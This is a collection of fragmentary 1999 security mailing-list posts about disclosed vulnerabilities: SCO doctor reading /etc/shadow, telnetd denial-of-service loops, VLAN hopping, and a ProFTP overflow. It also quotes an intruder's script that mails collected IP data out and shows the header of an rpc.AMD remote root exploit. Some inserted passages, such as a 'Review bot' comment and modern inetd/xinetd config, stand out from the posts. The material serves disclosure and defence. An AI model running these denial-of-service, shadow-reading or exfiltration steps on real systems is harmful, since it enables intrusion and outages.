On Wed, 8 Sep 1999, Dylan Griffiths wrote:
>John N Dvorak wrote:
>> Sven,
>>
>> I have verified the following platforms:
>>
>> BSDI 2.1
>> BSDI 3.1
>> BSDI 4.0
>> BSDI 4.0.1
>> Cobalt Linux (MIPS) - RedHat based
>>
>> All vulnerable.
>>
>> I am testing on other Linux platforms, but I presume all
Silvio mistyped the corecr URL for the mailing list, correct follows:
http://virus.beergrave.net/
Cheers.
Outlook Express 5 allows setting the Security Zones in the exact same way:
Tools/Options/Security. So does Outlook 98.
I don't think previous versions allowed it.
--On 9/7/1999, 11:23 AM -0700 David LeBlanc <[EMAIL PROTECTED]> wrote:
> I'm not sure what the variants of Outlook allow in this re
There's been a lot of press recently about Windows 2000 backdoors such as
the NSA key Crypto issue. I've been mulling over another "backdoor" for the
past few days and the more I think about the more cynical I become.
We had Windows 95, then were blessed with 98 and soon Windows 2000
Professional
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Mike and Mike wrote:
> While I think it's immensely useful that your study has debunked
> in hard testing a common myth (that VLANs provide unbeatable
> isolation), the limits of inter-switch VLAN isolation are discussed
> already in Cisco's document
hi,
Sorry for somewhat late reply...
>Why it is not convenient to use the sys_call_table?
>Using the sys_call_table to hook a system call is the 'right way', but it is
>not for a stealth module, because programs like "btrom" can detect that, and
>having the 'System.map' (file that every paranoic
The real problem is defining a "Notification message". Every mail server seems
to define its notification messages differently.
Supposedly notifications come from envelope sender <> so the format shouldn't
matter. But so many systems refuse mail from <> with a notification message of
their own t
By using a combination of problems it is a relatively easy matter for a
local user to gain administrative rights on a Windows NT 4 Server or
Workstation,
though this situation is easily rectifiable.
1) The default configuration permissions on Windows NT allow the Interactive
User,
that is the use
Hi,i found local DoS that Crash telnetd (tested on Slackware 4.0, RH 5.2)
type
telnet localhost | telnet localhost | telnet localhost .. about 50 times
result will be 'Connection Refused' , telnetd crash.
Zo0mer // kpz2000
confirmed to run under 5.0.4 as well.
On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
> Greetings,
>
>
> INFO:
> There is a local root compromise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably
>others. By supplying a doctor script file you can read the first partial line of any
This works against a lot of other stuff too.. That's the problem with
inetd, unless you use xinetd. It doesn't really support the limiting of
the number of processes that can be open. It's quite easy to fill the
process table if you can make enough of the processes linger around.
Why run ssh from
Greetings,
INFO: There is a local root compromise in SCO 5.0.5's
/bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file
you can read the first partial line of any file on the system (good enough for
/etc/shadow). Example:
scobox:/bin$ id
uid=136(btellier),200(users)sc
> Was this part of a suse installation?
Not part of SuSE 6 (which I use) or 5.2.
> What distro are you running?
didn't he say SuSE?
He probably got hacked somehow and the hacker forgot to remove this.
+-- +
| Stuart Harris / Unix systems administr
Hi,
I have found yet another buffer overflow in ProFTP 1.2.0pre4, which
may or may not be exploitable. I notified the authors and other
security related persons a week ago, and I still got no answer, in spite
of my repost.
So either they do not care, or my setup is badly done.
Why
On Sat, 4 Sep 1999, Wietse Venema wrote:
> Whatever reasoning the poster used, it is invalid with any reasonable
> mail system, because it is the mail system that chooses the bounce
> message originator address; the bounce message originator address
> is not under control by the attacker.
>
> In
> On Wed, 1 Sep 1999, Christian Koderer wrote:
> > ./IP | mail `printf
> > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > logout
> > _EOF_
>
>
> In case no one bothered figuring this one out, this translates to
> '[EMAIL PROTECTED]'
>
> Apparently './IP' is a program i
Does this writing to an EXE bypass Anti-Virus protection against programs
that write to EXE's?
How about a less damaging example that writes to say "C:\temp\example.exe"
so we can see what it does safely?
At 21:16 8/30/1999 -0400, SysAdmin Wrote:
>
>ANY Windows 98 file can be overwritten. Peri
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Saturday, September 4, a description of a potential problem with
the WatchGuard Firebox default configuration file was posted to
Bugtraq. At WatchGuard we take this sort of issue very seriously.
When we saw the post, we initiated contact with the p
Cisco Catalyst 2900
I have been able to reproduce this on 2 different Cisco switches. I would
like to know if anyone else has been able to.
Jason Lutz
Original Msg:
To Bugtraq,
We have recently conducted some testing into the security of the
implementation of VLANs on a pair of Cisco Catalys
Actually, there is currently a patch from brian feldman that is being
tested and will be added shortly to the -CURRENT tree for further
testing.. it adds a new login.conf action to limit sbsize.. to give you an
idea.. the sbsize in the mbuf crash is 2 mb.. which is huge.. you can
limit to however
Okay,
I added a link to http://www.sassproductions.com/hacked.htm that allows
you to test the exploit against a specific file. Specifically you need to
copy Reg Edit to the program files folder and give it a whirl. As always, if
you can't figure it out then View Source.
Over and out,
Seth Geo
On Fri, 3 Sep 1999, Alfonso Lazaro wrote:
> Date: Fri, 3 Sep 1999 13:18:02 +0200
> From: Alfonso Lazaro <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: limit maximum nr. of processes.
>
> On Wed, Sep 01, 1999 at 10:53:48AM +0200, Petter Wahlman <[EMAIL PROTECTED]>
>wrote:
>
>
Gentleman;
I submitted what I thought was a minor issue on Redhat's handling
of passwords. Is it me? Is it something I missed? Any password you
assign over 8 characters gets cut...
At first I thought it was my system but its not since I tested it at
home,
but then at work its the same thing:
--
patching:
in rc.conf above inetd_flags type -l -R 1024? :)
>Hi,
>
>At the beginning i'd like to excuse all of you if it is commonly well
>known (hmm, i guess it is, but no one patched it ;>.
>
>Both DoS`s use something known as portfuck (e.g. `while true; do telnet
>host port & done`).
>1. If yo
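An added example, not taken from any of the posts above, of the two knobs this thread and the earlier xinetd reply point at: FreeBSD inetd's rate limiting via inetd_flags in rc.conf, and xinetd's per-service limits. The flag values, the telnet service stanza and the server path are assumptions for illustration; check your own inetd(8) and xinetd.conf(5) for which of these options your release supports.

```conf
# /etc/rc.conf (FreeBSD): the flags the "-l -R 1024" suggestion above
# would set, plus the per-source and simultaneous-instance caps.
#   -l       log every connection accepted
#   -R 1024  allow at most 1024 invocations of one service per minute
#   -C 60    allow at most 60 invocations per minute from one source IP
#   -c 40    allow at most 40 simultaneous instances of one service
# Without -c/-C a single host can still pin the whole -R budget, which is
# exactly what "telnet localhost | telnet localhost | ..." does.
inetd_flags="-l -R 1024 -C 60 -c 40"

# /etc/xinetd.conf: the same idea, per service, for the xinetd case.
# instances  = max simultaneous servers for this service (was UNLIMITED)
# per_source = max simultaneous connections from one source address
# cps        = accept at most 10 connections/second, then sleep 30 s
service telnet
{
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = root
    server      = /usr/sbin/in.telnetd
    instances   = 40
    per_source  = 5
    cps         = 10 30
    disable     = no
}
```

The limits cap the damage from one source at `per_source` (or `-C`) processes rather than the whole process table; a legitimate burst above `cps` is refused for the retry interval instead of spawning a server per connection.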
>> >The other
>> >thing is that the default install for NT (especially on HP's) is FAT,
>>
>> Wrong. That could be how that manufacturer sets up _some_ of their
>> machines, but it isn't default for NT install.
>
>Micron and Intergraph also install NT on FAT when they ship it to you.
I can't thi
Hi!
> I had assumed that the whole problem with the vixie-cron exploit was
> that cron allowed users to invoke sendmail with arbitrary command-line
> options *as root*, so dropping SUID status doesn't do any good.
> Sendmail doesn't try to protect the root user from themselves.
I tried it on s
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
You can manually download the updates at
http://www.microsoft.com/windows98/downloads/corporate.asp
Personally, I prefer to actually save the update files so that I don't
need to download everything all over again whenever windows breaks and
I have t
On Wed, 01 Sep 1999 18:07:32 PDT, "Free, Bob" <[EMAIL PROTECTED]> said:
> reboot. When the installation is completed after rebooting, these keys are
> cleared and your legal notice is gone.
Having installations that blow away files *intended* for user configuration
is always Very Bad Juju.
> If
>> > Debian has
>> > discovered this bug two years ago and fixed it. Therefore versions in
>> > both, the stable and the unstable, distributions of Debian are not
>> > vulnerable to this problem..
Regardless of which, I was successfully able to take advantage of the
overflow on Debian (GNU/Linu
At 16:44 01.09.99 +0800, [EMAIL PROTECTED] wrote:
[implementation of 802.1q VLANs on Cisco Catalyst 2900 series]
>This has been
>discussed with Cisco and we believe that it is an issue with the
>802.1q specification rather than an implementation issue.
I disagree. IMHO, the root of the matter is
> -Original Message-
> From: 3xT [mailto:[EMAIL PROTECTED]]
> Sent: Monday, August 30, 1999 4:36 PM
>
> Currently most implementations of Dynamic DNS or "DDNS" rely
> upon only client IP addresses in an access list for
> authentication.
Windows 2000 uses TSIG and Kerberos for update authe
Believe me, it's still there - often... Why is it left open? Mainly because
the network admin who set up the firewall found it too hard to fix - I'd say..
Cheers,
Bret
At 10:51 PM 9/4/99 +1200, Alan Brown wrote:
>On Thu, 2 Sep 1999, Technical Incursion Countermeasures wrote:
>
>> You can do a
- Original Message -
From: Lucky Green <[EMAIL PROTECTED]>
To: cypherpunks@Algebra.COM <[EMAIL PROTECTED]>
Cc: Cryptography@C2.Net <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Sent: Friday, September 03, 1999 12:21 AM
Subject: NSA key in MSFT Crypto API
> Perhaps not surprisingly, the debug
At 11:19 AM 9/3/99 +1000, Brad Griffin wrote:
>" I use Eudora Pro and have IE 5 as the default mail viewer (as is the
>default Install) and you crashed Eudora (NT not logged in as
>Administrator). I had to disable IE 5 as the default viewer to see the
>mail..."
>I assume this would have been caus
-BEGIN PGP SIGNED MESSAGE-
On 02-Sep-99 Taneli Huuskonen wrote:
> + snprintf(command, sizeof(command)-1, "mv %s %s 2>&1 >/dev/null" , oldname,
> newname);
>return(system(command));
> }
>
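Review bot: The `mv %s %s` line hands oldname and newname to a shell unescaped, so any name containing shell metacharacters (`;`, backticks, `$(...)`, whitespace) runs arbitrary commands with the caller's privileges; use rename(2) for a same-filesystem move, or fork and execv("/bin/mv", ...) with the two names as separate argv entries, so no shell ever parses them. Two smaller points in the same lines: `sizeof(command)-1` drops a byte for no reason, since snprintf already NUL-terminates within the size given, and its return value should be compared against sizeof(command) to detect truncation; and `2>&1 >/dev/null` sends stderr to the original stdout and only stdout to /dev/null, so if silencing both was intended the order is `>/dev/null 2>&1`.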
> Without seeing the context, I can't say for sure, but this looks like a
> hole big enough to
Here's what I said about this on another list:
I must admit that this doesn't make much sense to me.
I was at Crypto, but I must have missed the rump session talk in question
(and it's entirely possible that the talk occurred anyway - I was out of the
room for a good deal of that session). In a
dorqus wrote:
> Maybe I'm missing something here...
>
> HOST# uname -a
> SunOS host 5.6 Generic_105181-12 sun4u sparc
you're missing 4 patches - the newest revision is 105181-16.
ok, forgive me.. it's friday afternoon ;)
--
best regards,
gl
_
Grzegorz
"Lancashire, Andrew" wrote:
>
> I don't know if you've ever seen this before. We ran nmap with ICMP
> discover and standard tcp scan. We ran the scan against the entire 10.0.0.0
> network range. Although we were only looking for 2 ports, we found that the
> RSM in our 5500 series (our default ro
On Wed, Sep 01, 1999 at 09:08:55PM +0400, Seva Gluschenko wrote:
> man sendmail:
> /-C
> ...skipping...
> -Cfile Use alternate configuration file. Sendmail refuses to run
> as root if an alternate configuration file is specified.
>
> and it does, for sure %-).
>
> Just tested
Here is the exploit for the AMD vulnerability. You may choose to send the
information via UDP or TCP, or even to bypass the portmap by specifying
the automount port.
/*
* SDI rpc.AMD automountd remote exploit for RedHat Linux
* Sekure SDI - Brazilian Informa
David LeBlanc writes:
> YOU CAN GET THE USER TO EXECUTE ARBITRARY CODE. Period. End of story.
> What you do with that code is up to you. There is no need to delve into
> the details of just how you steal the lunch money from the end users.
Well, it should be noted that there are things you can
A couple of people have sent me mail asking how to set Outlook 2000 such
that mail comes in under the 'Restricted Sites' zone. Here's how:
select Tools menu, Options item
select security tab
The area you want is in the middle of the page in the section marked
'Secure Content'. Default setting
Hello Seva Gluschenko!
Wed, Sep 01, 1999 at 21:08:55, gvs wrote about "Re: Root shell vixie cron exploit":
MZ> flags, this exploit won't bring anything shocking - simply, it's working
MZ> example.
>
> man sendmail:
> /-C
> ...skipping...
> -Cfile Use alternate configuration file. Send
[EMAIL PROTECTED] wrote:
> >Perhaps I don't see your point. How is this more secure
> >than StackGuard?
>
> StackGuard protection system has an extremely grave bug
> with the terminator and null canaries. In certain circumstances (not rare) this bug
>can be exploited
> preventing StackGuard to det
Despite how much I know it might pain some people, if one puts
"http://windowsupdate.microsoft.com" in the "Trusted" zone, then one can
still disable "safe for scripting" controls in the "Internet" zone and get
the convenience of Windows Update without prompting.
(You could still be DNS spoofed.